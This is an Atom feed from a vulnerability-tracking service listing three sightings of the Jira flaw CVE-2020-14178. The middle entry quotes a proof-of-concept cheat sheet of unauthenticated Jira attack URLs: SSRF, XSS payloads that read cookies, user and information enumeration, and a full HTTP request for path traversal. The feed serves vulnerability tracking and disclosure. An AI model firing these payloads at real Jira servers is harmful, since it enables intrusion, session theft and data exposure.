<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-05T14:24:50.527724+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the 10 most recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/901d47aa-a8c5-4d86-b85b-ed49f7061c4e/export</id>
    <title>901d47aa-a8c5-4d86-b85b-ed49f7061c4e</title>
    <updated>2026-05-05T14:24:50.911417+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "901d47aa-a8c5-4d86-b85b-ed49f7061c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14178", "type": "seen", "source": "https://t.me/cibsecurity/14399", "content": "ATTENTION\u203c New - CVE-2020-14178\n\nAffected versions of Atlassian Jira Server and Data Center allow remote attackers to enumerate project keys via an Information Disclosure vulnerability in the /browse.PROJECTKEY endpoint. The affected versions are before version 7.13.7, from version 8.0.0 before 8.5.8, and from version 8.6.0 before 8.12.0.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-09-01T12:55:33.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/901d47aa-a8c5-4d86-b85b-ed49f7061c4e/export"/>
    <published>2020-09-01T12:55:33+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/e1346311-8897-4767-8e25-e99d35aba9b4/export</id>
    <title>e1346311-8897-4767-8e25-e99d35aba9b4</title>
    <updated>2026-05-05T14:24:50.911275+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "e1346311-8897-4767-8e25-e99d35aba9b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14178", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&amp;amp;dashboardId=10000&amp;amp;cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&amp;amp;maxResults=50000&amp;amp;showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11.   CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12.   
CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&amp;amp;searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&amp;amp;Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&amp;amp;Search=Search&amp;amp;filterView=search&amp;amp;sortColumn=favcount&amp;amp;sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&amp;amp;maxResults=50000&amp;amp;showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&amp;amp;dashboardId=10000&amp;amp;cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&amp;amp;searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&amp;amp;Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&amp;amp;dashboardId=10101&amp;amp;cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&amp;amp;transitionFx=none&amp;amp;random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/e1346311-8897-4767-8e25-e99d35aba9b4/export"/>
    <published>2024-03-18T07:23:33+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/8439d859-f098-4b81-ab4f-87675134d4e1/export</id>
    <title>8439d859-f098-4b81-ab4f-87675134d4e1</title>
    <updated>2026-05-05T14:24:50.908951+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "8439d859-f098-4b81-ab4f-87675134d4e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14178", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/8439d859-f098-4b81-ab4f-87675134d4e1/export"/>
    <published>2024-10-09T19:49:41+00:00</published>
  </entry>
</feed>
